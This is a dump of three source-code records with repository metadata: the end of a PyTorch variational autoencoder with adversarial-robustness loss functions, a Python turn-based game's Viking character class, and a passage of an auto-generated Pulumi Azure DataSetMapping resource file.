layers.append(Clip(max_norm, cuda=self.config.cuda))
return layers
def project_network_weights(self, proj_config):
# Project the weights on the manifold of orthonormal matrices.
for i, layer in enumerate(self.encoder_mean):
if hasattr(self.encoder_mean[i], 'project_weights'):
self.encoder_mean[i].project_weights(proj_config)
for i, layer in enumerate(self.encoder_std_dev):
if hasattr(self.encoder_std_dev[i], 'project_weights'):
self.encoder_std_dev[i].project_weights(proj_config)
for i, layer in enumerate(self.decoder):
if hasattr(self.decoder[i], 'project_weights'):
self.decoder[i].project_weights(proj_config)
def get_latents(self, x):
x = x.view(-1, self.input_dim)
encoder_mean = self.encoder_mean(x)
if self.gamma is None:
encoder_std_dev = self.encoder_std_dev(x)
else:
encoder_std_dev = self.gamma * torch.ones(encoder_mean.shape)
z = encoder_mean + encoder_std_dev * self.standard_normal.sample(encoder_mean.shape)
return z, encoder_mean, encoder_std_dev
# BB: Code taken but slightly adapted from Alex Camuto and Matthew Willetts
# Note: maximum_noise_norm defines maximum radius of ball induced by noise around datapoint
# If not "scale", then "clipping" (i.e. upper bound on norm rather than tight constraint)
def eval_max_damage_attack(self, x, noise, maximum_noise_norm, scale=False):
noise = torch.tensor(noise)
x = torch.tensor(x)
noise.requires_grad_(True)
x.requires_grad_(True)
if scale:
noise = maximum_noise_norm * noise.div(noise.norm(p=2))
else:
if noise.norm(p=2) > maximum_noise_norm:
noise = maximum_noise_norm * noise.div(noise.norm(p=2))
noisy_x = x.view(-1, self.input_dim) + noise.view(-1, self.input_dim)
original_reconstruction, _, _ = self.forward(x.view(-1, self.input_dim).float())
noisy_reconstruction, _, _ = self.forward(noisy_x.float())
# BB: Note this is the maximum damage objective
loss = -(noisy_reconstruction - original_reconstruction).norm(p=2)
gradient = torch.autograd.grad(loss, noise, retain_graph=True, create_graph=True)[0]
return loss, gradient
# BB: Code taken but adapted from Alex Camuto and Matthew Willetts
# Uses attack in Eq. 5 of https://arxiv.org/pdf/1806.04646.pdf
def eval_latent_space_attack(self, x, target_x, noise, soft=False, regularization_coefficient=None, maximum_noise_norm=None):
noise = torch.tensor(noise)
x = torch.tensor(x)
noise.requires_grad_(True)
x.requires_grad_(True)
if not soft:
if noise.norm(p=2) > maximum_noise_norm:
noise = maximum_noise_norm * noise.div(noise.norm(p=2))
noisy_x = x.view(-1, self.input_dim) + noise.view(-1, self.input_dim)
_, noisy_mean, noisy_std_dev = self.forward(noisy_x.float())
_, target_mean, target_std_dev = self.forward(target_x.view(-1, self.input_dim).float())
noisy_z_distribution = ds.multivariate_normal.MultivariateNormal(noisy_mean, noisy_std_dev.pow(2).squeeze().diag())
target_z_distribution = ds.multivariate_normal.MultivariateNormal(target_mean, target_std_dev.pow(2).squeeze().diag())
if soft:
loss = ds.kl.kl_divergence(noisy_z_distribution, target_z_distribution) + regularization_coefficient * noise.norm(p=2).sum()
else:
loss = ds.kl.kl_divergence(noisy_z_distribution, target_z_distribution)
gradient = torch.autograd.grad(loss, noise, retain_graph=True, create_graph=True)[0]
return loss, gradient
# BB: Not implemented for now (left until later / necessary)
def get_activations(self, x):
raise NotImplementedError | [
"fabianbarrett@college.harvard.edu"
] | fabianbarrett@college.harvard.edu |
90359ef949e323c83804ee217228a9b80a4fb08d | 6b8ac2b07f1077c4284d04a448d202bdbb3bc7b6 | /Viking.py | abdbe759385bf138ce9beba9db2f04af22895f53 | [] | no_license | GoatAndOwl/EntityFall-v2.2.0 | eef2dede1ac597dd487fde2760c68fdf94a83203 | 6af0c8bcff22476109d2db2ffe281538872b7e1b | refs/heads/master | 2020-04-10T18:08:24.682103 | 2018-12-10T15:20:15 | 2018-12-10T15:20:15 | 161,194,979 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,193 | py | from scene import *
from Classes import *
import Constants as ct
import random
class Viking(Entity):
def __init__(self, player):
Entity.__init__(self)
self.images = [['Images/Viking/VikingFace0-0.png', 'Images/Viking/VikingFace0-1.png',
'Images/Viking/VikingFace0-2.png'],
[None, None],
['Images/Viking/VikingFace2-1.PNG', 'Images/Viking/VikingFace2-2.PNG']]
self.IMG = SpriteNode(self.images[0][0])
self.IMG.anchor_point = (0, 1)
self.IMG.x_scale = 0.01*ct.CELL_X
self.IMG.y_scale = 0.01*ct.CELL_Y+0.15
self.IMG.position = (-250,-250)
self.IMG.z_position = 2.0
self.classSetup(player['abilities'], player['passives'])
self.targetedCells = None
self.name = 'Viking'
self.team = player['team']
self.stats = {'health': ct.VK_STATS['health'],
'MP': ct.VK_STATS['MP'],
'EP': ct.VK_STATS['EP'],
'orientation': None}
self.Startstats = {'health': ct.VK_STATS['health'],
'MP': ct.VK_STATS['MP'],
'EP': ct.VK_STATS['EP'],
'orientation': None}
def Ability1(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_1']['minRange'],
ct.VK_ABILITIES['ability_1']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_1']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_1']['MPcost']:
for ability in self.played_abilities:
if ability == 'ability_1':
x += 1
if lastCell in self.targetedCells and x < 2:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_1']['value'], False, True, 'ability_1')
self.stats['EP'] -= ct.VK_ABILITIES['ability_1']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_1']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_1', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_1')
self.effectsClean()
def Ability2(self, selectedcell, lastCell, game):
hit = False
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_2']['minRange'],
ct.VK_ABILITIES['ability_2']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif selectedcell and len(self.played_abilities) and self.Passive3 in self.passives:
if self.played_abilities[len(self.played_abilities)-1] \
== 'ability_1':
path = game.pathMultiplicator(selectedcell, self)
for cell in game.groundCells:
if path[1] == 'right' or path[1] == 'left':
if cell.coordX == selectedcell.coordX and \
(cell.coordY-1 == selectedcell.coordY or \
cell.coordY+1 == selectedcell.coordY):
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
elif path[1] == 'top' or path[1] == 'bottom':
if cell.coordY == selectedcell.coordY and \
(cell.coordX-1 == selectedcell.coordX or \
cell.coordX+1 == selectedcell.coordX):
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
for cell in self.zoneCells:
if selectedcell in self.targetedCells:
cell.cellType = 'SelectedCell'
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_2']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_2']['MPcost']:
if lastCell in self.targetedCells:
for entity in game.entityList:
for cell2 in self.zoneCells:
if entity.coordX == cell2.coordX and \
entity.coordY == cell2.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_2']['value'], False, False, 'ability_2')
hit = True
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_2']['value'], False, True, 'ability_2')
hit = True
if hit:
self.stats['EP'] -= ct.VK_ABILITIES['ability_2']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_2']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_2', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.zoneCells = []
self.played_abilities.append('ability_2')
self.effectsClean()
def Ability3(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_3']['minRange'],
ct.VK_ABILITIES['ability_3']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_3']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_3']['MPcost']:
for effect in self.effects:
if effect['name'] == 'charge':
x += 1
if lastCell in self.targetedCells:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
if x < 3:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_3']['value'], False, True, 'ability_3')
else:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_3']['value']*2, False, True, 'ability_3')
self.stats['EP'] -= ct.VK_ABILITIES['ability_3']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_3']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_3', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_3')
self.effectsClean()
def Ability4(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_4']['minRange'],
ct.VK_ABILITIES['ability_4']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_4']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_4']['MPcost']:
if lastCell in self.targetedCells:
for effect in self.effects:
if effect['name'] == 'toughness':
x = 1
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY and not x:
toughness1 = {'name': 'toughness',
'type': 'MPboost',
'situation': 'turnBegin',
'value': 1,
'duration_type': 'until_turns',
'duration': 1,
'source': self} # utile uniquement pour une future application d'affichage d'effet
toughness2 = {'name': 'toughness',
'type': 'MPboost',
'situation': 'turnBegin',
'value': 1,
'duration_type': 'until_turns',
'duration': 2,
'source': self}
self.effects.append(toughness1)
self.effects.append(toughness2)
self.stats['MP'] += 2
self.stats['EP'] -= ct.VK_ABILITIES['ability_4']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_4']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_4', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_4')
self.effectsClean()
def Ability5(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_5']['minRange'],
ct.VK_ABILITIES['ability_5']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_5']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_5']['MPcost']:
for effect in self.effects:
if effect['name'] == 'charge':
x += 1
if lastCell in self.targetedCells:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_5']['value'], False, True, 'ability_5')
game.collisionCalculator(entity, 1+x, self, False)
self.stats['EP'] -= ct.VK_ABILITIES['ability_5']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_5']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_5', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_5')
self.effectsClean()
def Ability6(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_6']['minRange'],
ct.VK_ABILITIES['ability_6']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_6']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_6']['MPcost']:
for ability in self.played_abilities:
if ability == 'ability_6':
x = 1
if lastCell in self.targetedCells and not x:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY and not x:
sharpened = {'name': 'sharpened',
'type': 'damage_%',
'situation': 'attacking',
'value': ct.VK_ABILITIES['ability_6']['value'],
'duration_type': 'next_attack',
'duration': 1,
'source': self}
self.effects.append(sharpened)
self.stats['EP'] -= ct.VK_ABILITIES['ability_6']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_6']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_6', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_6')
self.effectsClean()
def Ability7(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_7']['minRange'],
ct.VK_ABILITIES['ability_7']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_7']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_7']['MPcost']:
for ability in self.played_abilities:
if ability == 'ability_7':
x += 1
if lastCell in self.targetedCells and x < 2:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_7']['value'], False, True, 'ability_7')
game.collisionCalculator(entity, 2, self, False)
game.collisionCalculator(self, 2, self, False)
self.stats['EP'] -= ct.VK_ABILITIES['ability_7']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_7']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_7', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_7')
self.effectsClean()
def Ability8(self, selectedcell, lastCell, game):
hit = False
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_8']['minRange'],
ct.VK_ABILITIES['ability_8']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif selectedcell:
if selectedcell in self.targetedCells:
if len(self.played_abilities) >= 2:
if self.Passive3 in self.passives and self.played_abilities[len(self.played_abilities)-1] == 'ability_2' and \
self.played_abilities[len(self.played_abilities)-2] == 'ability_2':
x = 1
path = game.pathMultiplicator(selectedcell, self)
if x == 1:
for cell in game.groundCells:
if (self.coordX-1 == cell.coordX or self.coordX+1 == cell.coordX) and \
self.coordY-1 <= cell.coordY <= self.coordY+1:
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif (self.coordY-1 == cell.coordY or self.coordY+1 == cell.coordY) and \
self.coordX-1 <= cell.coordX <= self.coordX+1:
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
else:
for cell in game.groundCells:
if path[1] == 'right' or path[1] == 'left':
if cell.coordX == selectedcell.coordX and \
(cell.coordY-1 == selectedcell.coordY or \
cell.coordY+1 == selectedcell.coordY):
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
elif path[1] == 'top' or path[1] == 'bottom':
if cell.coordY == selectedcell.coordY and \
(cell.coordX-1 == selectedcell.coordX or \
cell.coordX+1 == selectedcell.coordX):
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
for cell in self.zoneCells:
if selectedcell in self.targetedCells:
cell.cellType = 'SelectedCell'
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_8']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_8']['MPcost']:
if lastCell in self.targetedCells:
for entity in game.entityList:
for cell2 in self.zoneCells:
if entity.coordX == cell2.coordX and \
entity.coordY == cell2.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_8']['value'], False, False, 'ability_8')
hit = True
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_8']['value'], False, True, 'ability_8')
hit = True
if hit:
self.stats['EP'] -= ct.VK_ABILITIES['ability_8']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_8']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_8', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.zoneCells = []
self.played_abilities.append('ability_8')
self.effectsClean()
def Ability9(self, selectedcell, lastCell, game):
x, y = 0, 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_9']['minRange'],
ct.VK_ABILITIES['ability_9']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_9']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_9']['MPcost']:
if lastCell in self.targetedCells:
for entity2 in game.entityList:
if entity2.controller.team == self.controller.team:
for effect in self.effects:
if effect['name'] == 'VKshield' and \
effect['source'] == self:
x += 1
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
if x < 1 and not self.Passive4 in self.passives:
vkShield = {'name': 'VKshield',
'type': 'damage_%',
'situation': 'defending',
'value': 0.10,
'duration_type': 'until_turns',
'duration': 2,
'source': self}
y = 1
elif x < 2 and self.Passive4 in self.passives:
vkShield = {'name': 'VKshield',
'type': 'damage_%',
'situation': 'defending',
'value': 0.15,
'duration_type': 'until_turns',
'duration': 3,
'source': self}
y = 1
if y:
self.effects.append(vkShield)
self.stats['EP'] -= ct.VK_ABILITIES['ability_9']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_9']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_9', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_9')
self.effectsClean()
def Ability10(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_10']['minRange'],
ct.VK_ABILITIES['ability_10']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_10']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_10']['MPcost']:
for ability in self.played_abilities:
if ability == 'ability_10':
x += 1
if lastCell in self.targetedCells and x < 2:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_10']['value'], False, False, 'ability_10', True)
if entity.stats['health'] > entity.Startstats['health']:
entity.stats['health'] = entity.Startstats['health']
self.stats['EP'] -= ct.VK_ABILITIES['ability_10']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_10']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_10', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_10')
self.effectsClean()
def Passive1(self):
if self.controller.isPlaying and len(self.moveSteps):
charge = {'name': 'charge',
'type': 'damage_%',
'situation': 'attacking',
'value': 0.05,
'duration_type': 'next_attack',
'duration': 1,
'source': self}
x = len(self.moveSteps)-1
if self.lastMove == None:
self.lastMove = self.moveSteps[x]
self.effects.append(charge)
print('charge +1')
elif self.lastMove == self.moveSteps[x]:
self.effects.append(charge)
print('charge +1')
elif self.lastMove != self.moveSteps[x]:
y = []
for effect in self.effects:
if effect['name'] == 'charge':
y.append(effect)
for effect2 in y:
self.effects.remove(effect2)
del effect2
print('charge reset')
self.effects.append(charge)
self.lastMove = self.moveSteps[x]
print('charge +1')
def Passive2(self):
hardHead = {'name': 'hardHead',
'type': 'damage_%',
'situation': 'defending_front',
'value': 0.15,
'duration_type': 'infinitely',
'duration': 999,
'source': self}
if not hardHead in self.effects:
self.effects.append(hardHead)
def Passive3(self):
pass # active les combos si présent dans self.passives
def Passive4(self):
pass # booste l'actif 9'
def Passive5(self):
certifiedRunner = {'name': 'certifiedRunner',
'type': 'MPboost',
'situation': 'turnBegin',
'value': 1,
'duration_type': 'infinitely',
'duration': 999,
'source': self}
if not certifiedRunner in self.effects:
self.effects.append(certifiedRunner)
def Passive6(self):
HealthyArmor = {'name': 'HealthyArmor',
'type': 'HPboost',
'situation': 'gameBegin',
'value': 30,
'duration_type': 'infinitely',
'duration': 999,
'source': self}
if not HealthyArmor in self.effects:
self.effects.append(HealthyArmor)
self.stats['health'] += 30
self.Startstats['health'] += 30
| [
"ridel.timothe@outlook.com"
] | ridel.timothe@outlook.com |
538609c419c2927cdc8dfadedbe9bd4adf2e7c9f | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/datashare/v20201001preview/data_set_mapping.py | e00a71eae41a251fe545b0c3ef3d7cbfc785120d | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 12,170 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = ['DataSetMappingArgs', 'DataSetMapping']
@pulumi.input_type
class DataSetMappingArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
kind: pulumi.Input[Union[str, 'DataSetMappingKind']],
resource_group_name: pulumi.Input[str],
share_subscription_name: pulumi.Input[str],
data_set_mapping_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DataSetMapping resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[Union[str, 'DataSetMappingKind']] kind: Kind of data set mapping.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "kind", kind)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "share_subscription_name", share_subscription_name)
if data_set_mapping_name is not None:
pulumi.set(__self__, "data_set_mapping_name", data_set_mapping_name)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the share account.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[Union[str, 'DataSetMappingKind']]:
"""
Kind of data set mapping.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[Union[str, 'DataSetMappingKind']]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="shareSubscriptionName")
def share_subscription_name(self) -> pulumi.Input[str]:
"""
The name of the share subscription which will hold the data set sink.
"""
return pulumi.get(self, "share_subscription_name")
@share_subscription_name.setter
def share_subscription_name(self, value: pulumi.Input[str]):
pulumi.set(self, "share_subscription_name", value)
@property
@pulumi.getter(name="dataSetMappingName")
def data_set_mapping_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the data set mapping to be created.
"""
return pulumi.get(self, "data_set_mapping_name")
@data_set_mapping_name.setter
def data_set_mapping_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_set_mapping_name", value)
warnings.warn("""Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""", DeprecationWarning)
class DataSetMapping(pulumi.CustomResource):
warnings.warn("""Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'DataSetMappingKind']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A data set mapping data transfer object.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
:param pulumi.Input[Union[str, 'DataSetMappingKind']] kind: Kind of data set mapping.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DataSetMappingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A data set mapping data transfer object.
:param str resource_name: The name of the resource.
:param DataSetMappingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DataSetMappingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'DataSetMappingKind']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
pulumi.log.warn("""DataSetMapping is deprecated: Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DataSetMappingArgs.__new__(DataSetMappingArgs)
if account_name is None and not opts.urn:
